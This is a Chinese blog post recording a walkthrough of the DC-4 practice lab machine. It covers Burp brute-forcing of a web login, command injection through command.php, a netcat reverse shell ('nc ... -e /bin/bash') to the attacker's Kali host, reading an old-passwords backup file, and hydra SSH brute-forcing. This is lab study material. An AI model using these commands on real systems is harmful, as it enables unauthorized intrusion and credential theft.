DC-4学习记录

最新推荐文章于 2024-09-05 11:40:28 发布
最新推荐文章于 2024-09-05 11:40:28 发布
阅读量228 收藏
点赞数
文章标签: 学习 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45590470/article/details/127449700
版权
本文介绍了通过信息收集、漏洞挖掘和利用,使用Burp Suite爆破用户名和密码,并通过nc进行命令执行。在获取到靶机的ls命令权限后,查看了command.php文件并进一步执行whoami命令。接着,通过shell_exec和nc建立连接,寻找并尝试破解SSH登录密码,最终成功连接并获取了旧密码信息。
摘要由CSDN通过智能技术生成

一、信息收集

1、靶机ip

192.168.209.153

二、漏洞挖掘

1、访问ip地址

我们发现这是个登录框
在这里插入图片描述

三、漏洞利用

1、burp爆破用户名和密码

在这里插入图片描述

用户名:admin
密码:happy

2、抓包、修改信息

在这里插入图片描述

在这里插入图片描述

我们发现选定第一个,点击run,好像是执行一个列出所有文件操作,为了验证猜想,我抓包看一下。

在这里插入图片描述
在这里我们可以看出提交有ls命令,我尝试一下输入其他命令,看看能不能成功,在上面列出的文件里有command.php文件,那么我可以查看一下这个文件,看看可不可以查看成功。
在这里插入图片描述
我们可以看出我们查看到了command.php文件。
在这里插入图片描述
再比如输入whoami
在这里插入图片描述

四、nc

1、配置连接

shell_exec —通过 shell 执行命令并将完整的输出作为字符串返回.

nc
-h

在这里插入图片描述
开启监听:

nc -l -vv -p 8888

program to exec after connect [dangerous!!]

原来是这:
在这里插入图片描述
现在输入kali的ip进行连接

nc 192.168.209.143 8888 -e /bin/bash

在这里插入图片描述
然后点击forword
在这里插入图片描述

whoami

在这里插入图片描述这样就显示已经监听成功了。

2、查找有用信息

我们可以尝试着找root

cd /home
ls

cd ./jim
ls

cd ./mbox
ls

cd ./backups
ls

在这里插入图片描述
好,那我们查看一下这个文件。

cat old-passwords.bak

在这里插入图片描述
这里好像是一些老的密码。
我们这里保存一下
在这里插入图片描述

3、破解ssh登录密码

在这里插入图片描述
这里jim作为user

(1)、使用hydra工具

爆破ssh

hydra -l jim -P dc-4.txt -t 10 ssh://192.168.209.153

hydra -l 用户名 -p 密码字典 -t 线程 ip ssh

ssh账号:jim密码:jibril04
注意:不要用反弹的shell,因为自己创建的文件在本地的shell里面,所以要在本地的SHELL里输入命令。

在这里插入图片描述

五、写在末尾的话

有关nc:
https://www.sqlsec.com/2019/10/nc.html
coner00
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-4靶机学习笔记
浅时光-Trister
08-28 457
DC-4靶机学习笔记
dc-7学习记录
qq_45590470的博客
10-28 859
主机:129.168.209.143靶机:129.168.209.156。
DC-9靶机渗透学习记录
tyut_dummy的博客
07-13 1677
我们可以通过端口探测进行开启ssh服务。通俗来说端口探测可以理解为,我按顺序敲击端口就可以将ssh服务打开,反之敲击关闭,端口顺序存放在/etc/knockd.conf文件中。发现用户名和密码,尝试在web登陆页面使用,尝试几次后并不能登录,猜测该用户名和密码并不是web登录页面的用户名和密码。kali中安装需要的工具,如:nmap,sqlmap,dirb,hydra,nc,burpsuite等等。发现新的fredf用户,登录该用户,sudo -l命令查看到以root权限运行的文件,进行查看。
dc-4 靶机渗透学习
..
03-19 3133
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
Dc-2学习记录
qq_45590470的博客
10-19 485
dc-2
DC-DC电路设计学习笔记——自举电容
Jerry_westar的博客
04-18 1826
在同步BUCK基本拓扑中,上管即控制Vin输入导通的开关器件,下管即形成电感放电回路的开关器件,在DC-DC芯片内部,下管的S极直接与GND相连,只需G极提供一个大于Vgs(th)的电压即可导通。由图,上管的S极接到了输出电压Vsw,此时为维持上管导通则需要提供大于Vsw+Vgs(th)的电压,条件较为苛刻,故需增加自举电容。当PWM控制器提供高电平,HS Driver开始导通时,Vgs逐渐上升,当上管开始导通后,Vsw逐渐上升,此时由于Cboot的存在,BST位置电压会同步抬高,以维持上管的导通状态。
DC-DC电路设计学习笔记——输出电容选型
Jerry_westar的博客
04-27 3526
输入和输入大电容旁边往往并联一个小容量的陶瓷电容,由于ESL的存在,不同电容的自谐振频率不同(在自谐振频率处电容阻抗最小,近似短路,滤波效果最好)。电感中单个周期内纹波电流流过输出电容引起的纹波电压,由输出电容的等效串联电阻ESR引起,单周期内电感充放电,电流先抬升后下降。实际电容由于制作工艺,通常具有较大的电感效应,大电容的电感效应更明显,其自谐振频率相对较小,更适合滤除低频信号,小电容的电感效应较小,其自谐振频率相对较高,更适合滤除高频信号。增加时,对于给定的电容,阻抗减小,高频信号更容易通过电容。
DC-CDN学习笔记
chen_znn的博客
07-21 2815
人脸反欺骗 (FAS) 在保护人脸识别系统方面发挥着至关重要的作用。最近,中心差分卷积 (CDC) 通过利用局部梯度特征展示了其对 FAS 任务的出色表示能力。然而,聚合来自所有相邻方向的中心差异线索会使 CDC 在训练阶段变得多余和次优化。......
【B站孙老师】DC-DC开关电源的学习笔记(非常适合小白的学习笔记)
yayamada_omi的博客
04-26 948
通过不断开关电路上的MOS管,获得一个周期性的方波,计算高电平与低电平的比例。例如:12V转5V,高低电平比例就是5:7。这样子得到的波形为一个变动的高低电压,而我们理想的波形是一个稳定的一个电压。所以我们需要下一步需要做的就是滤波。根据电容电压电流公式,I=C*du/dt。当电容两端电压发生突变,这个dt就会无穷小,。所以电容两端电压不能突变。如何抑制这个电流?加上电感就能够给稳定的电流让电容充电。但是电感有一个毛病,电感两边的电流不能突变。刚才说到电感两边的电流不能突变,如下图所示。
DC-2 靶机学习笔记
浅时光-Trister
08-24 449
DC-2靶机学习笔记
双向DC-DC变换器(A题)-教程与笔记习题
05-18
通过学习本教程,你将对双向DC-DC变换器的工作原理、设计方法以及应用有深入的理解,为进一步研究电力电子系统和进行实际项目开发打下坚实的基础。参考“双向DC-DC变换器(A题).pdf”文件,可以获得更详细的信息和...
UC3843芯片的DC-DC升压电路multisim仿真源文件.zip
07-03
**正文** 本资源包含了一个基于UC3843芯片的...通过这个Multisim仿真源文件,学习者不仅可以深入了解UC3843芯片在DC-DC升压电路中的应用,还可以掌握电路设计和仿真的技巧,为实际的硬件设计提供理论基础和实践经验。
学习笔记】卫星通信NTN 3GPP标准化进展分析(六)- 参考标准
u011376987的博客
09-01 1127
本文总结了NTN标准化进程以及后续的研究计划,是学习NTN协议的入门。本文来自3GPP Joern Krause, 3GPP MCC。
iomuxc、pinctrl子系统、gpio子系统(学习总结)
weixin_61385844的博客
09-04 788
IOMUXC是SOC设计中实现引脚复用的关键组件,它通过动态切换引脚功能,提高了IO资源的利用率,满足了不同外设和功能的IO需求。在配置和使用IOMUXC时,需要参考芯片使用手册和设备树文档,确保引脚功能的正确设置。
Datawhale X 李宏毅苹果书AI夏令营 学习笔记
m0_61049596的博客
08-31 1137
今天,我继续学习了深度学习中的优化算法,并且着重理解了如何利用。等高级优化器来提高模型训练的效率和效果。2024年8月30日。
学习项目1
m0_62803606的博客
09-03 1594
这篇文章主要记录你最近入手的无线串口模块的配置情况,这是个很好的习惯,尤其是在你以后需要重复操作或排查问题时,会非常有帮助。- **DL_20无线串口模块**:这是一个常见的无线串口通信模块,通常基于nRF24L01+等无线通信芯片,支持点对点或多点通信,适合短距离的无线数据传输。是的,如果你按照步骤成功配置了两个模块并将它们连接到单机和电脑,当你在上位机软件(如SSCOM)上能稳定地接收到从单片机发送的数据(例如每秒输出的T值),就说明两个无线模块之间的通信已经配置成功。
算法的学习笔记—把数字翻译成字符串
业精于勤,荒于嬉
08-31 952
通过动态规划的方法,我们可以高效地计算出一个数字字符串有多少种不同的翻译方法。这个问题不仅考察了我们对动态规划的理解,还让我们熟悉了如何处理字符串中的边界情况和状态转移。希望通过这个例子的讲解,能够帮助你更好地理解动态规划的应用。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybit欢迎大家加入我的社区尘觉社区文章到这里就结束了,如果有什么疑问的地方请指出,诸佬们一起来评论区一起讨论
IP学习——Fiveday
最新发布
qq_52973916的博客
09-05 257
设备排错:注意黑洞路由
EmguCV学习笔记 C# 第10章 人脸识别
UruseiBest 的技术专栏
09-05 281
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。10.1 人脸检测 CascadeClassifier类。10.2.2.1 EigenFaceRecgnizer类。10.2.1 LBPHFaceRecgnizer类。10.2 人脸识别 FaceRecgnizer类。教程配套文件及相关说明。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值